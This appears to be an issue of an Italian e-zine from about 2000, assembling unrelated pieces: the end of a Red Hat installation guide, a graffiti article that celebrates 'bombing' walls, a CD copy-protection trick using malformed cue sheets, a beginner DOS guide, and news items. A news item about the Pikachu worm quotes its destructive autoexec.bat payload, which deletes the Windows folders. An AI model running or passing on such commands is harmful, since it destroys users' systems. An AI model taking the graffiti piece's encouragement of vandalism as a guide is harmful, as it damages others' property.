| |
| |
| |
| |
| Drive Summaries |
| Drive Geom [C/H/S] Total Used Free |
| hda [ 1024/16/63] 528M 528M 0M [############] ]
| |
| |
| |
| .-----. .------. .--------. .----. .------. |
| | Add | | Edit | | Delete | | Ok | | Back | |
| `-----' `------' `--------' `----' `------' |
| |
`------------------------------------------------------------------------------'
F1-Add F2-Add NFS F3-Edit F4-Delete F5-Reset F12-Ok




Figura 4 Il programma di installazione chiede di specificare come utilizzare le varie partizioni, in particolare quella principale.

L'esempio mostrato nella figura rappresenta le partizioni con i punti di innesto già determinati. Per farlo in pratica, si utilizza il pulsante grafico <Edit> per definire quanto riguarda la partizione evidenziata con la barra di scorrimento. Si osservi che /dev/hda3 è la partizione principale, che conterrà il file system principale, mentre /dev/hda1 è la partizione contenente il sistema operativo Dos, che, quando si avvia GNU/Linux, risulterà montata a partire dalla directory /dos/. Al termine, per proseguire, si deve selezionare il pulsante grafico <Ok>.

Dopo la definizione dei punti di innesto viene proposta la selezione delle partizioni di scambio, cioè quelle da dedicare alla memoria virtuale. Il programma di installazione mostra quelle esistenti e permette di attivarne l'utilizzo attraverso una casella di selezione che vi appare a fianco, come si può vedere nella figura.


Attivando una casella di selezione apposita, è possibile richiedere esplicitamente il controllo delle partizioni durante l'inizializzazione, in modo da verificare che non esistano settori difettosi.

L'inizializzazione e il controllo eventuale di queste partizioni viene fatto subito, in modo da poter attivare la memoria virtuale prima di procedere con le operazioni successive. Anche le indicazioni date in questa fase servono per costruire il file /etc/fstab finale.

L'indicazione delle partizioni normali da inizializzare viene data subito dopo quelle destinate alla memoria virtuale. Anche in questo caso è possibile richiedere un controllo della partizione durante l'inizializzazione, come si vede nella figura.


Parte 6.7. Le partizioni da inizializzare.

L'inizializzazione di queste partizioni (in questo caso una sola) non avviene subito; si attende che vengano selezionati i pacchetti da installare, e quindi, a cose fatte, verrà avviata l'inizializzazione e l'installazione dei pacchetti, lasciando libero l'utente di occuparsi d'altro.



Parte 6.8 Selezione dei pacchetti di applicazioni e avvio della loro installazione

Le distribuzioni GNU/Linux derivate direttamente della Red Hat permettono di selezionare i pacchetti in modo piuttosto semplificato, per gruppi di pacchetti, e solo se lo si richiede espressamente, anche in modo dettagliato. Per poter ottenere un'installazione minima si possono deselezionare tutti i gruppi di pacchetti: verrà installato solo ciò che è indispensabile. In alternativa si può anche eseguire un'installazione totale, se si ritiene di disporre di spazio sul disco a sufficienza.(3)

La gestione dei pacchetti dopo l'installazione è abbastanza agevole, quindi, le prime volte non è il caso di crearsi troppi problemi sulla scelta dei pacchetti da installare. Se si vuole eseguire l'installazione completa, si può selezionare l'ultima voce: Everything. Se si conosce già bene GNU/Linux, e gli applicativi che con esso di possono utilizzare, si può selezionare la voce Select individual packages, in modo da rifinire le richieste di massima definite in questa prima fase.


Se durante la scelta dei gruppi di pacchetti era stato richiesto di indicare in modo dettagliato quali pacchetti installare, appare un menù dei gruppi di pacchetti, da cui si può ottenere un elenco dettagliato dove selezionare o deselezionare quanto desiderato. Inizialmente, appare un elenco dove vengono proposte le categorie dei pacchetti che possono essere installati (si tratta di una classificazione differente e già più dettagliata di quanto visto nella fase precedente).


.-------------------------| Select Group |--------------------------.
| |
| Choose a group to examine Installed system size: 278M |
| Press F1 for a package description |
| |
| + [o] Amusements/Games 4.2M # |
| + [o] Amusements/Graphics 4.1M X |
| + [*] Amusements/Multimedia 0.2M X |
| + [o] Applications/Archiving 0.8M X |
| + [o] Applications/Communications 0.6M X |
| + [ ] Applications/Databases X |
| + [o] Applications/Editors 0.5M X |
| + [ ] Applications/Emulators X |
| |
| .------. .------. |
| | Done | | Back | |
| `------' `------' |
| |
`-------------------------------------------------------------------'

Figura 5 Selezione dei pacchetti in base alla categoria.

Utilizzando i tasti [+] e [-] è possibile selezionare o deselezionare la categoria evidenziata dalla barra del cursore. In tal caso si può osservare un asterisco (*) o uno spazio all'interno della casellina di selezione che vi appare a sinistra. Precisamente, l'asterisco rappresenta la selezione di tutti i pacchetti di quella categoria, mentre la casellina vuota indica che non è stato selezionato alcun pacchetto del gruppo relativo. Inoltre, su alcune categorie appare già la lettera "o" che indica la selezione di alcuni dei suoi pacchetti (in base alla selezione dei gruppi fatta in precedenza).

È possibile accedere all'elenco dei pacchetti di una categoria premendo la [barra spaziatrice]. A questo punto, i tasti [+] e [-], oppure anche la [barra spaziatrice], servono per includere o escludere un pacchetto preciso.



.-------------------------| Select Group |--------------------------.
| |
| Choose a group to examine Installed system size: 278M |
| Press F1 for a package description |
| |
| + [o] Amusements/Games 4.2M # |
| + [o] Amusements/Graphics 4.1M X |
| + [*] Amusements/Multimedia 0.2M X |
| - [o] Applications/Archiving 0.2M X |
| [ ] dump X |
| [ ] lha X |
| [*] sharutils 0.2M X |
| [ ] unarj X |
| |
| .------. .------. |
| | Done | | Back | |
| `------' `------' |
| |
`-------------------------------------------------------------------'

Figura 6 Selezione dei pacchetti di una categoria.

In conclusione, in questa fase si può rifinire quanto indicato in linea di massima attraverso la precedente selezione dei gruppi di pacchetti. Naturalmente, così facendo si rischia di non soddisfare tutte le dipendenze che ci possono essere tra i pacchetti. Se ciò accade, il programma di installazione avvisa e richiede se si vogliono installare anche i pacchetti necessari a soddisfare le dipendenze.

Dopo la selezione dei pacchetti da installare, si passa alla fase dell'installazione di questi nel file system organizzato secondo quanto visto in precedenza. Prima però, vengono inizializzate le partizioni che erano state definite. L'installazione dei pacchetti è un processo automatico che non richiede interventi, a parte quando si verificano errori di qualche tipo.

Parte 6.9 Configurazione conclusiva

Al termine dell'installazione dei pacchetti inizia la fase della configurazione conclusiva, di ciò che non sia già stato definito durante l'installazione. Quasi tutto viene configurato attraverso programmi che poi sono disponibili anche nel sistema GNU/Linux che si ottiene, in modo da poter modificare le impostazioni agevolmente.

In particolare, la configurazione della rete potrebbe essere già stata definita all'inizio dell'installazione, quando si utilizza una copia della distribuzione accessibile solo attraverso la rete. Se necessario, si può modificare quanto già impostato.


Parte 6.9.1 Mouse

La configurazione del mouse può essere ripetuta anche dopo che il sistema GNU/Linux è stato installato, utilizzando il programma mouseconfig. Viene fatta inizialmente una scansione delle porte su cui potrebbe essere connesso un mouse. Se viene trovato, viene richiesto di confermare la scelta del protocollo (cioè del tipo di mouse).


La distribuzione Red Hat utilizza questa definizione sia per la gestione del mouse con i programmi che utilizzano lo schermo a matrice di caratteri, sia per la configurazione del sistema grafico X, quando questa viene fatta attraverso gli strumenti della distribuzione stessa. Questa affermazione non è ovvia, perché si tratta di due cose indipendenti.

Con il sistema grafico X è importante avere a disposizione tre tasti del mouse. Se si dispone solo di due, il terzo deve essere emulato in qualche modo. La schermata mostra una casella di selezione con l'etichetta Emulate 3 buttons?. Selezionando tale casella si ottiene questa emulazione.

Se si sceglie un mouse seriale, viene chiesto successivamente di indicare la porta in cui è connesso. Questa operazione è intuitiva.


Parte 7 Configurazione della rete

A questo punto è possibile configurare la connessione in rete. Se l'installazione è stata fatta utilizzando la rete, questa configurazione è già avvenuta, e può essere semplicemente lasciata così com'è. In ogni caso, se l'elaboratore su cui si installa GNU/Linux è connesso a una rete, è opportuno definire questa connessione in questa fase (purché lo si sappia fare). Successivamente si potranno utilizzare solo strumenti grafici che richiedono il sistema grafico X.



Parte 8 Orologio e ora locale

La configurazione dell'ora locale richiede in pratica l'indicazione della capitale, Europe/Rome. È opportuno fare in modo che l'orologio interno dell'elaboratore sia posizionato sull'ora di riferimento definita dal tempo universale (in origine si indicava come GMT, o Greenwich Mean Time). La configurazione dell'ora locale può essere modificata in qualunque momento utilizzando il programma timeconfig.


Parte 9 Servizi


La configurazione dei servizi da attivare quando si avvia il sistema può essere ripetuta anche dopo che GNU/Linux è stato installato, utilizzando il programma ntsysv. Perché un servizio sia attivato, basta fare in modo che la casella corrispondente sia selezionata; il contrario se si vuole escludere un certo servizio.



Parte 10 Stampa

La configurazione delle stampanti è un'operazione piuttosto articolata, a seconda che si tratti di stampanti locali o remote. Il programma che viene utilizzato non è più disponibile dopo l'installazione. Al suo posto si deve adoperare un programma analogo che richiede il sistema grafico X, oppure si deve intervenire direttamente sui file di configurazione. Qui viene mostrata solo la configurazione di una stampante locale.


Dopo avere specificato che si intende installare una stampante (nel nostro caso si tratta di una stampante locale), il programma di configurazione propone il nome di una coda di stampa e la sua collocazione nel file system. L'esempio mostrato nella figura presenta il caso della coda lp, che è tradizionalmente il nome predefinito della coda di stampa principale.

Viene richiesto quindi di indicare la porta parallela a cui è connessa tale stampante. Il programma stesso cerca di individuarla e la propone all'utente. È importante tenere presente che la corrispondenza tra i nomi dei dispositivi e le porte dipende da diversi fattori, quindi il fatto che il programma aiuti a individuare le porte presenti è di grande utilità.



.-----------| Local Printer Device |------------.
| |
| What device is your printer connected to |
| (note that /dev/lp0 is equivalent to LPT1:)? |
| |
| Printer Device: /dev/lp0______ |
| |
| Auto-detected ports: |
| |
| /dev/lp0: Detected |
| /dev/lp1: Not Detected |
| /dev/lp2: Not Detected |
| |
| .----. .------. |
| | Ok | | Back | |
| `----' `------' |
| |
`-----------------------------------------------'

Figura 7 L'indicazione della porta parallela a cui è connessa la stampante viene fatta con l'aiuto del programma di configurazione, attraverso la scelta del file di dispositivo corrispondente.

Alla coda di stampa (e non alla porta parallela) si deve poi abbinare un tipo di emulazione di stampa. L'esempio mostra la scelta di una stampante PostScript. In realtà è più probabile che si tratti di un tipo diverso.


Successivamente viene richiesto di indicare la risoluzione della stampa, il formato normale della carta utilizzata, e infine l'eventuale correzione della scalettatura. Chi non conosce cosa sia la scalettatura (stair-stepping) farebbe bene a selezionare la casella corrispondente.




Parte 11 Password dell'utente root

Prima che l'installazione sia conclusa, viene chiesto all'utente di definire la password dell'utente root. Ciò rappresenta il minimo possibile della sicurezza, per evitare che il sistema appena installato sia in balia di ogni possibile attacco. Il lavoro di definizione degli utenti potrà essere fatto dopo l'installazione.

La schermata mostra questa richiesta da parte del programma di installazione. Come al solito, a titolo precauzionale, viene richiesto il suo inserimento per due volte.



Parte 12 Configurazione del sistema di autenticazione

Dopo aver definito la password dell'utente root, viene richiesto di specificare alcuni elementi generali del sistema di autenticazione. Per la precisione si tratta di indicare l'utilizzo o meno del NIS, l'uso delle password shadow, l'utilizzo di password cifrate attraverso la firma MD5.

L'utente inesperto che non ha la necessità di proteggere il proprio sistema in modo particolare, può fare a meno (inizialmente) di queste funzioni. Per quanto riguarda il NIS, è evidente che occorre una rete locale già configurata e provvista di questo servizio.



Parte 13 Dischetto di avvio di emergenza e LILO

L'ultima cosa fondamentale da definire, prima di concludere definitivamente il procedimento di installazione, è il modo in cui si deve avviare il sistema. In pratica, viene proposto di predisporre un dischetto di avvio di emergenza e di configurare LILO in modo da avviare il sistema automaticamente.

La creazione di un dischetto di avvio di emergenza è molto importante, e non dovrebbe essere saltata, specialmente le prime volte. Oltre a ciò, è bene tenere presente che la configurazione che si può ottenere con LILO, attraverso il programma di installazione, è piuttosto limitata, quindi il dischetto di avvio è sempre una buona cosa per cominciare bene.

Quando è il turno di configurare LILO, viene presentata solo la scelta di installare il settore di avvio nell'MBR, cioè il primo settore del disco fisso, oppure nel primo settore della partizione in cui risiede GNU/Linux. Purtroppo ci sono situazioni in cui queste due possibilità sono troppo poche, per quello che si vuole fare, quindi conviene utilizzare il dischetto di avvio per poter avviare il sistema e quindi configurare LILO come si vuole.


Nella situazione più semplice, si lascia che LILO modifichi l'MBR, in modo da dare a questo il controllo dell'avvio di GNU/Linux e degli altri eventuali sistemi operativi. Se per qualche motivo ciò non può essere fatto, installandolo nel primo settore della partizione contenente GNU/Linux occorre poi affidare a un altro programma (detto bootloader) l'avvio di quel settore.

LILO, come altri sistemi di avvio di GNU/Linux, permette di indicare alcuni parametri per il kernel che potrebbero rendersi necessari in presenza di dispositivi particolari che non vengono individuati correttamente, o in altre situazioni simili. Per sapere come comporre tali parametri occorre conoscere questo meccanismo. L'utente medio non dovrebbe preoccuparsi di questa riga, lasciando la maschera come si vede nella schermata.




Parte 14 XFree86

Se tra i pacchetti installati c'è anche il sistema grafico X, per la precisione XFree86, viene richiesto all'utente di definire la sua configurazione attraverso il programma Xconfigurator, che potrà essere utilizzato anche in seguito per modificarla.

Il programma di configurazione esegue una scansione diagnostica alla ricerca della scheda video. Se si tratta di una scheda PCI è molto probabile che venga identificata. Se la ricerca fallisce, viene richiesto all'utente di scegliere un tipo di scheda, o direttamente il servente grafico. Successivamente si passa all'indicazione del tipo di monitor.


È poco probabile che si riesca a trovare il proprio modello tra quelli proposti dall'elenco, per cui è quasi obbligatorio indicare il tipo Custom. Si deve quindi indicare la frequenza orizzontale e verticale. È importante che le frequenze selezionate non superino i limiti stabiliti dalla casa costruttrice del monitor.


Scelta della frequenza verticale.

A seconda del tipo di scheda video disponibile potrebbe essere richiesta la selezione del cosiddetto RAMDAC. Se viene richiesto, in caso di dubbio si può rinunciare a specificarne il valore.

Un punto delicato è dato invece dal cosiddetto clockchip. Se non si sa di cosa si tratti, è bene non indicare alcunché, come si vede nella schermata.


Successivamente deve essere selezionata la quantità di memoria a disposizione della scheda video. È importante non indicarne più di quanta realmente presente.

Indicazione della memoria video disponibile.

Infine, si devono indicare le modalità video, cioè la dimensione dello schermo espressa in punti. Per evitare fastidi inutili, sarebbe conveniente indicare una sola risoluzione per tutti i tipi di profondità di colori. La schemata mostra in particolare un esempio in cui è stata selezionata solo la risoluzione 800x600, sia per la profondità di colori a 8 bit, sia per la profondità a 16 bit, escludendo quella a 24 bit.


Al termine, viene provato l'avvio del servente grafico selezionato, utilizzando la configurazione indicata, in modo da permettere una verifica del suo funzionamento. In modalità grafica viene presentata una finestra di dialogo per richiedere la conferma del funzionamento. Se la risposta è affermativa, viene anche chiesto se si intende avviare immediatamente il sistema operativo in modo grafico. A parere di chi scrive, sarebbe meglio evitare questo tipo di soluzione, lasciando che sia l'utente a decidere quando avviare il sistema grafico.



Parte 15 Conclusione



Dopo la configurazione di LILO e del sistema grafico, il sistema viene fermato e riavviato. È necessario togliere il dischetto utilizzato per l'installazione per verificare se funziona il sistema di avvio di GNU/Linux.



Mano a mano che gli utenti installano una nuova versione della distribuzione, vengono evidenziati i problemi di questo o quel pacchetto. Per questo, nei CD-ROM, così come negli FTP, si trova la directory updates/ contenente gli aggiornamenti riferiti a una versione particolare della distribuzione Red Hat. Il problema sta nel fatto che il programma di installazione non cerca automaticamente di installare la versione più aggiornata dei pacchetti. Perciò questo resta il compito dell'amministratore. Tuttavia, l'utente inesperto non dovrebbe preoccuparsene.



Parte 16 Riferimenti



-The Official Red Hat Linux Installation Guide

-Red Hat, On-Line Documentation





-Red Hat, On-Line Documentation, Red Hat Linux







Appunti di informatica libera 2000.07.31
--- Copyright (c) 2000 Daniele Giacomini -- daniele@swlibero.org ---
------------------------------------------------------------------------


1) La distribuzione GNU/Linux Mandrake è l'esempio tipico di una tale distribuzione derivata da Red Hat.



2) Il programma di installazione crea i file di dispositivo in modo dinamico, utilizzando la directory temporanea. Per questo motivo, fdisk mostra dei nomi di dispositivo insoliti: /tmp/hda1, /tmp/hda2,...



3) Per la precisione, per ottenere un'installazione minima, si devono selezionare tutti i gruppi, e subito dopo, si devono deselezionare nuovamente.


*** o * * ****
* * ** * ***
*** * * ** *
* * * * ****


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

____________________________________
|<<<<<<<<<<<<<<<<<0<<<<<<<0<<<<<<<<<<|
|§<<<§<§<<<<§<§§§<§<§§§§§<§<§<<§<<§§§
|<§<<<§§<<<§<<§§§<§<<<§<<<§<§§<§<§<<<|
|<<§<§<<§<§<<<§§<<§<<<§<<<§<§<§§<§<§§|
|<<<§<<<<§<<<<§<§<§<<<§<<<§<§<<§<<§§§|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
------------------------------------


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#########################Intro al writing#######################<³¤|
|¤³>################################################################<³¤|


Introduzione al writing made in FR33ST0

Ciao a tutti io sono freesto, un bboy che scrive per Underground Magazine. Proprio ieri fratello cook viene lì con gli altri della banda e mi dice: "Uomohiphop (su c6 ho sto nick) mettiamoci su seriamente!" Okey!!!
Mi ha chiesto di cosa potevo trattare e io ho subito scartato l'idea di parlare di hacking, xchè è meglio che lo faccia qualcuno che di hacking se ne intende davvero!?!no???quindi ho risposto: dottò potrei fare writing! ed eccomi qua a menarvi la minchia con bombolette taggarelli muri e tecniche. Qui freesto ELEMENTI BRUCIATI CLICK a devastarvi la mente come devasto i muri hihihihihhihi.
Mentre sto scrivendo ste minchiate sto ascoltando CENTRO13, minchia spaccano, mi danno la carica... ok ho capito non ve ne fotte un cazzo.Vai Freesto si parte!
Allora in questo fottuto primo numero di questa fottuta e-zine da questo fottuto nome Underground Magazine voglio raccortavi la fottuta storia del WRITING.
Prima cosa voglio dirvi che non spingo nessuno a devastare i muri questo è solo un testo informativo, se la pula vi viene a cercare non dite: è stato quel pezzo di merda di Freesto. no io non centro un cazzo!
Allora la storia del writing inizia nei ghetti americani e con i neri e nelle metro chi è razzista cancelli sto file dal suo pc, non è degno di leggerlo, inizialmente la tag (che veramente sarebbe il tag) era una firma per segnare il territorio delle bande, ora invece serve specialmente per farsi conoscere e per devastare, ma molti writer pensano di avere il loro territorio e gli altri devastatori non possono entrarci a fare dei bei muri. AAA appello a sti stronzi: chi vi credete di essere i muri sono di tutti! :)
Dai ghetti e dalle metro quest'arte si è evoluta in tutto il mondo, inizialmente i writer erano solo bboy ma ora ci sono writer anche punk, rasta, metallari ecc.
La tag è un soprannome, una specie di nickname che si usa per firmare i pezzi e per scrivere sui muri in modo da farsi conoscere, non deve essere per forza con un significato, l'importante è che piaccia a voi, la dovete scrivere in un modo strano, che faccia stile, non deve essere né "piena""vuota"(come dice oldyron, bella fratè) può essere facile da capire oppure supercontorta, prima di decidere la propria tag bisogna vedere se ce l'ha già qualche writer, chi copia le tag si chiama SUCKER!!!!!!!!!!! Non date mai del SUCKER ad un bboy o a un writer, si potrebbe incazzare e voi potreste finire all'ospedale, io vi ho avvertiti!
Per essere writer non basta avere una tag e scriverla ovunque, bisogna anche fare dei pezzi, su muri, metro, autobus, treni e dove volete voi, devastare in giro con tag e trouw-up(scritte semplici non colorate dentro) si chiama bombing, vi assicuro che è divertente, vi fa salire su l'adrenalina come poche cose, io ho lasciato il bombing da tempo ma vorrei riniziare a praticarlo.
Questo è la parte writing del il primo numero di underground magazine, so che sta prima parte fa un po' cagare ed è un po' noiosa ma dovevo spiegarvi cos'è il writing e poi se vi spiego tutto nel primo numero, poi che faccio?!?!?la prossima penso di parlare di tecniche per devastare, dove devastare e come devastare, bombolette, taggarelli, ...
Bella a tutti fratelli!
Qua FREESTO della ELEMENTI BRUCIATI CLICK per Underground Magazine
--il writing è un'arte, una cultura, non sporcatela con cazzate--
hiphop don't stop!

Nota by Cookbooker: mi dispiace ragazzi, ma non abbiamo trovato nessuno di meglio... eheh,
grande Freesto ;o)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----------------------------------------------------------------------

oooo oo ooo o o o o
o o o o o o o o o
o o o <> ooo o oo o
o o o o o o o o o
oooo o o o o o o

----------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<###################Creare cd non duplicabili...#################<³¤|
|¤³>################################################################<³¤|


COME CREARE DA SOLI CD-R NON DUPLICABILI, CON POCA FATICA E SENZA SPENDERE UNA LIRA :O)

Autore: Rhost

A fianco delle tecniche di crittografia e di quelle basate sull'utilizzo di "impronte digitali", marker laser, chiavi hardware e codici seriali, esistono metodi di protezione + semplici (e per questo meno sicuri), che non richiedeono hardware specifico e che possono essere utilizzati da tutti.
l'idea che sta alla base di queste tecniche è di fare in modo che la TOC (Table Of Contents) generata in fase di masterizzazione sia illegale. tentando di copiare un disco protetto in questo modo si ottiene un errore e, se si è passati direttamente alla fase di copia senza la simulazione, si avrà un supporto da buttare.
Per spiegare in dettaglio come sia possibile compiere una tale operazione vediamo un esempio pratico. Innanzitutto dobbiamo procurarci gli strumenti dei quali avremo bisogno: CDRWin di Golden Hawk Technology e un text editor. Il primo è prelevabile gratuitamente all'indirizzo www.goldenhawk.com/download_body.htm (la versione scaricabile è pienamente funzionante, con l'unica limitazione sulla velocità di scrittura bloccata a 1x), mentre Notepad di Windows va benissimo come text editor.
La prima operazione da compiere è quella di creare un CD-R contenente il software da proteggere. A questo punto, utilizzando l'opzione EXTRACT DISC di CDRWin, si deve creare su disco fisso un'immagine del CD-R, assegnandole un nome (nel nostro esempio nome_file).
Prima di proseguire dobbiamo conoscere l'esatta lunghezza del file, utilizzando il menu RECORD DISC/LOAD CUESHEET. Nel nostro esempio la supporremo pari a 32:36:12 (minuti:secondi:centesimi di secondo).
Editando con Notepad il CUE file (nome_file.CUE) otteniamo il seguente listato:


FILE"nome_file" BINARY
TRACK 01 MODE1/2352
INDEX 01 00:00:00

Quello che si deve fare è modificare il CUE nel seguente modo:

FILE"nome_file" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
TRACK 02 MODE2/2352
INDEX 01 32:34:12

Dove il tempo riportato nell'ultima riga è pari al tempo totale (nell'esempio 32:36:12) meno 2 secondi (nell'esempio 32:34:12). Salviamo il CUE file e registriamo l'immagine con il comando RECORD DISC, ignorando il messaggio d'errore. Quello che otteniamo è un disco con 2 tracce dati; la posizione di partenza della seconda traccia coincide però con quella di leadout della prima, la TOC è quindi illegale e il CD-R non è copiabile con nessun software, Nero a parte. Questo "trucco" può essere utilizzato anche per proteggere CD-R audio e mixed mode 2: l'unica differenza consiste nel sottrarre non due ma quattro secondi dal tempo totale del disco dal CUE file.
Un altro metodo per rendere la TOC illegale è quello di creare un disco con due tracce dati di tipo differente (una Modo 1 e una Modo 2). La struttura del CUE file sarà del tipo:

FILE "nome_file" BINARY
TRACK 01 MODE1/2352
INDEX 01 00:00:00
TRACK 02 MODE2/2352
INDEX 01 32:36:12

Con questa tecnica il CD-R non è duplicabile nemmeno da Nero-=(.
Un metodo alternativo all'alterazione della TOC, sicuramente meno efficace ma assai + semplice da realizzare, consiste nell'utilizzare la tecnica dell'overburning.
Registrando il disco oltre la sua capacità nominale, questo sarà duplicabile solamente utilizzando appositi supporti CD-R di maggiore capacità (da 80 minuti) e usando un software che supporti l'overburning (per esempio Nero o CDRWin).

Alla prox!

rhost@post.com



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~ ` ...ooo......ooo...oooo.
` ~ ..o..o....o...o..o....
` .o...o...o...o...ooo.
~ ~ .o..o....o...o......o
- .ooo......ooo....oooo

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#############################il DOS#############################<³¤|
|¤³>################################################################<³¤|


Di:----------------EvilAngel
Livello:-----------Principianti
Argomento:---------MS-DOS

Eccomi qui!!! Il mio PRIMO ARTICOLO intelligente! Addirittura UNA GUIDA! Vabbè, cominciamo:

Disclaimer:
Tutto ciò che è scritto in questo articolo è da considerarsi a puro scopo informativo (trad.:leggete e sparlatene tutti, questo è il mio testo).
C'è il copyLEFT, quindi ogni riproduzione parziale o totale di codesto articolo saranno perseguite a norma di legge. Pagabile a vista al portatore.

-------------------------------
| Prima Lezione: Cenni generali |
-------------------------------

Cos'è il dos? Avete presente uno dei computer vecchi, si accendeva il computer e sul monitor appariva un inquietante

c:\>

ecco, quello era il PROMPT del DOS. Il prompt è quello che il dos usa per dire "dimmi cosa posso fare x te". Anche se, visto l'intelligenza del dos, sarebbe più opportuno dire "fammi capire cosa posso fare per te" :-) .
Facciamo un esempio, vogliamo rinominare il file "c:\a" in "c:\b".
Dobbiamo far capire al nostro caro amico dos le nostre intenzioni. Sce scriviamo:

c:\>rinomina c:\a in c:\b

il nostro amichetto dos ci risponderebbe

Comando o nome di file errato

ovvero: "Che cavolo dici? Non ti capisco! Parla come mangi!"
Per venire incontro a ciò utilizziamo dei COMANDI. Ad esempio, per rinominare il file c:\a in c:\b digitiamo

c:\>REN c:\a c:\b

Ren (rename, RINOMINA), come la maggior parte dei comandi dos, ha bisogno di PARAMETRI, ovvero, dobbiamo dire al dos, oltre all'operazione da fare, anche con cosa deve farla.
In questo caso ren si usa così

REN [file1] [file2]

e rinomina il file1 in file2. Questo è solo uno dei tanti comandi del dos. Col dos possiamo fare praticamente fare tutto (più o meno) quello che possiamo fare con windows, e a volte anche di più.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^SEZIONE APPROFONDIMENTI^^^^^^^^^^^^^^^^^^^^^^^^

Eccoci qui, amici smanettoni, lo so che siete affamati di sapere, e io vi sfamerò! Volete sapere quali file corrispondono al dos? Ve lo dirò seduta stante, essi si trovano nella cartella RADICE del disco rigido (C:\) e si chiamano:

COMMAND.COM Il sistema
IO.SYS Un file nascosto che carica delle cose all'avvio
MSDOS.SYS Idem

Per eliminare gli ATTRIBUTI dei file IO.SYS e MSDOS.SYS usate i comandi

c:\>ATTRIB -shr io.sys
c:\>ATTRIB -shr msdos.sys

s=sistema, h=nascosto, r=sola lettura. Il segno + (più) aggiunge questi attributi mentre - (meno) li elimina. Fatto ciò possiamo copiare questi file da qualche parte remota del nostro pc (un floppy? :-P) da windows, o aspettate la prossima lezione (perchè oggi mi rompo di spiegare come si fa).


EvilAngel vi saluta


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


.0...................
.o..o...o.oooo..ooo..
.o..oo..o.o....o...o.
.o..o.o.o.ooo..o...o.
.o..o..oo.o....o...o.
.o..o...o.o.....ooo..
.....................


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

|¤³>############################\|____|/############################<³¤|
|¤³<############################-{NEWZ}-############################<³¤|
|¤³>############################_|----|_############################<³¤|


30/10/00
Washington (USA)
Il 30 Ottobre scorso alcuni pirati informatici sono riusciti, attraverso un trojano dalle apparenti origini cinesi (QAZ), ad entrare nella rete interna di mamma MiCrRo$oZz ed a visualizzare una parte, secondo il CEO M$ Steve Ballmer minima, dei codici sorgenti di Windows e, molto probabilmente, Office.
Il vero "pericolo" dell'accaduto non è il fatto che questi "pirati" siano venuti a conoscenza di alkuni sorgenti targati M$ (a noi ke c'è frega? meglio... ;), ma sta nel fatto ke li sia stata data la possibilità di modificare questi sorgenti e di inserirne alkune Backdoor; a quanto pare questo non è successo... ma per ora non ne possiamo essere sicuri.



25/08/00
New York (USA) - I Pokémon sono un virus, è ufficiale. Trend Micro ha segnalato il diffondersi di TROJ_POKEY.A, un virus che arriva via posta elettronica e che può danneggiare i sistemi Windows a 32 bit dopo essersi autoinviato come allegato email a tutti i destinatari inseriti nella rubrica di Outlook del computer vittima.
Da quanto si apprende, il virus si presenta in un messaggio che ha come subject: "Pikachu Pokemon", ovvero il nome del più famoso personaggio della celebre serie di cartoon. Il testo è una breve frase in inglese: "Pikachu is your friend", e in allegato c'è il file da non aprire. Un file che, se aperto, lancia un piccolo Pikachu che si apre sul desktop e che scrive in inglese un messaggio: "Tra milioni di persone nel mondo ho trovato te. Non dimenticarti di ricordare questo messaggio AMICO MIO".
Al momento "Pokey", come è stato ribattezzato il virus "WIN32/Pikachu.32768.Worm", pare diffondersi soprattutto negli Stati Uniti con una velocità comunque molto inferiore a quella di certi recenti codici distruttivi, come ILoveYou.
Sul piano "tecnico", il virus ha una dimensione di 32.768 byte e, una volta lanciato, sovrascrive l'autoexec.bat con questo codice:

@ECHO OFF
del C:\WINDOWS
del C:\WINDOWS\SYSTEM\*.*

